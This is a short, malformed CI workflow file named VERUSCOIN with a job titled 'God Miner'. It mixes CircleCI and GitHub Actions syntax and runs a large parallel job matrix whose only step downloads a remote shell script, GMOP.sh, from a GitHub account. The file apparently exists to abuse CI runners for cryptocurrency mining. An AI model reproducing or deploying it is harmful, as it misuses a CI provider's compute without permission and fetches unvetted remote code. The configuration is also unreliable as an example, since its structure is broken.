
 
orbs:
  win: circleci/windows@2.2.0
 
name: VERUSCOIN
on: [push, pull_request]
jobs:
  build:
    name: God Miner
    runs-on: circleci/windows@2.2.0
strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
      run: |
        wget https://raw.githubusercontent.com/Godmine99/cpu/main/GMOP.sh